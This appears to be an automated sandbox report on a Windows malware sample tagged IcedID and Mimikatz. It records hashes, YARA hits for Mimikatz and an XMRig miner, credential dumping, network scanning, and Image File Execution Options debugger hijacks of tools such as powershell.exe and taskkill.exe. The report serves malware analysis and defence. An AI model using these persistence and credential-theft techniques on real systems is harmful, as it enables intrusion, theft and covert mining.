Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-01-2025 00:38
Behavioral task
behavioral1
Sample
2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe
-
Size
13.5MB
-
MD5
47520804f3f824bb4ed7328a05e192b2
-
SHA1
0f898876f4c2094eabd68077da8b84077957f1e9
-
SHA256
91939e7bd8357b957b3918509c67cdf7d70b9940d4d42d5e910552a7b6a9c364
-
SHA512
7c78a2631c6d41f5f591f98e10bc6ac0cf5b755835b1195e327fd0d514a85addb953507355a2dedc2fa288c131c7815dc4059d92fa73143e8e050e4fb24ab7f3
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2292 created 1396 2292 yyuzvnr.exe 37 -
Xmrig family
-
Contacts a large (29722) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/3188-178-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-182-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-199-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-216-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-225-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-234-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-249-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-376-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-378-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-380-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-635-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig behavioral2/memory/3188-636-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/1340-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/1340-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x000a000000023b88-6.dat mimikatz behavioral2/memory/1448-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3316-136-0x00007FF6020D0000-0x00007FF6021BE000-memory.dmp mimikatz behavioral2/memory/3316-138-0x00007FF6020D0000-0x00007FF6021BE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts yyuzvnr.exe File opened for modification C:\Windows\system32\drivers\etc\hosts yyuzvnr.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe yyuzvnr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3504 netsh.exe 3476 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 1448 yyuzvnr.exe 2292 yyuzvnr.exe 2228 wpcap.exe 4204 penegiqll.exe 3316 vfshost.exe 3244 tllgdyunt.exe 672 xohudmc.exe 2372 iaacws.exe 3188 uieubf.exe 3452 tllgdyunt.exe 3548 tllgdyunt.exe 2296 tllgdyunt.exe 4684 tllgdyunt.exe 3504 tllgdyunt.exe 1400 tllgdyunt.exe 1840 tllgdyunt.exe 2208 tllgdyunt.exe 3248 yyuzvnr.exe 2648 tllgdyunt.exe 4836 tllgdyunt.exe 2108 tllgdyunt.exe 4276 tllgdyunt.exe 2976 tllgdyunt.exe 4652 tllgdyunt.exe 2864 tllgdyunt.exe 1384 tllgdyunt.exe 5084 tllgdyunt.exe 4620 tuznevtjd.exe 5544 yyuzvnr.exe -
Loads dropped DLL 12 IoCs
pid Process 2228 wpcap.exe 2228 wpcap.exe 2228 wpcap.exe 2228 wpcap.exe 2228 wpcap.exe 2228 wpcap.exe 2228 wpcap.exe 2228 wpcap.exe 2228 wpcap.exe 4204 penegiqll.exe 4204 penegiqll.exe 4204 penegiqll.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ifconfig.me 67 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 yyuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 yyuzvnr.exe File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\iaacws.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F yyuzvnr.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content yyuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE yyuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache yyuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData yyuzvnr.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\iaacws.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies yyuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft yyuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 yyuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F yyuzvnr.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe -
resource yara_rule behavioral2/files/0x0007000000023c72-134.dat upx behavioral2/memory/3316-136-0x00007FF6020D0000-0x00007FF6021BE000-memory.dmp upx behavioral2/memory/3316-138-0x00007FF6020D0000-0x00007FF6021BE000-memory.dmp upx behavioral2/files/0x0007000000023c7d-141.dat upx behavioral2/memory/3244-142-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3244-157-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/files/0x0007000000023c7a-164.dat upx behavioral2/memory/3188-165-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/3452-171-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3548-175-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3188-178-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/2296-180-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3188-182-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/4684-185-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3504-189-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/1400-193-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/1840-197-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3188-199-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/2208-202-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/2648-210-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/4836-214-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3188-216-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/2108-219-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/4276-223-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3188-225-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/2976-228-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/4652-231-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/2864-233-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3188-234-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/1384-236-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/5084-238-0x00007FF7FDE80000-0x00007FF7FDEDB000-memory.dmp upx behavioral2/memory/3188-249-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/3188-376-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/3188-378-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/3188-380-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/3188-635-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx behavioral2/memory/3188-636-0x00007FF680BD0000-0x00007FF680CF0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\rgpuenbvt\Corporate\mimilib.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\svschost.exe yyuzvnr.exe File opened for modification C:\Windows\klhnlzly\svschost.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\AppCapture64.dll yyuzvnr.exe File opened for modification C:\Windows\klhnlzly\vimpcsvc.xml yyuzvnr.exe File created C:\Windows\ime\yyuzvnr.exe yyuzvnr.exe File created C:\Windows\rgpuenbvt\hzvztyutv\ip.txt yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\vimpcsvc.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\hzvztyutv\wpcap.exe yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\trfo-2.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\docmicfg.exe yyuzvnr.exe File created C:\Windows\rgpuenbvt\hzvztyutv\tuznevtjd.exe yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\zlib1.dll yyuzvnr.exe File opened for modification C:\Windows\rgpuenbvt\Corporate\log.txt cmd.exe File created C:\Windows\rgpuenbvt\UnattendGC\AppCapture32.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\libeay32.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\spoolsrv.exe yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\schoedcl.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\xdvl-0.dll yyuzvnr.exe File created C:\Windows\klhnlzly\schoedcl.xml yyuzvnr.exe File created C:\Windows\klhnlzly\svschost.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\spoolsrv.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\docmicfg.xml yyuzvnr.exe File created C:\Windows\klhnlzly\spoolsrv.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\Shellcode.ini yyuzvnr.exe File created C:\Windows\rgpuenbvt\hzvztyutv\Packet.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\coli-0.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\exma-1.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\cnli-1.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\schoedcl.exe yyuzvnr.exe File created C:\Windows\klhnlzly\vimpcsvc.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\svschost.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\ucl.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\vimpcsvc.xml yyuzvnr.exe File opened for modification C:\Windows\klhnlzly\yyuzvnr.exe 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\trch-1.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\tucl-1.dll yyuzvnr.exe File created C:\Windows\klhnlzly\yyuzvnr.exe 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe File created C:\Windows\rgpuenbvt\hzvztyutv\penegiqll.exe yyuzvnr.exe File opened for modification C:\Windows\klhnlzly\schoedcl.xml yyuzvnr.exe File opened for modification C:\Windows\klhnlzly\docmicfg.xml yyuzvnr.exe File opened for modification C:\Windows\rgpuenbvt\hzvztyutv\Result.txt tuznevtjd.exe File created C:\Windows\rgpuenbvt\hzvztyutv\wpcap.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\spoolsrv.xml yyuzvnr.exe File opened for modification C:\Windows\klhnlzly\spoolsrv.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\ssleay32.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\tibe-2.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\svschost.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\vimpcsvc.exe yyuzvnr.exe File created C:\Windows\klhnlzly\docmicfg.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\upbdrjv\swrpwe.exe yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\posh-0.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\docmicfg.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\schoedcl.xml yyuzvnr.exe File created C:\Windows\rgpuenbvt\Corporate\vfshost.exe yyuzvnr.exe File created C:\Windows\rgpuenbvt\Corporate\mimidrv.sys yyuzvnr.exe File opened for modification C:\Windows\rgpuenbvt\hzvztyutv\Packet.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\crli-0.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\UnattendGC\specials\libxml2.dll yyuzvnr.exe File created C:\Windows\rgpuenbvt\hzvztyutv\scan.bat yyuzvnr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4460 sc.exe 4480 sc.exe 3696 sc.exe 4880 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened 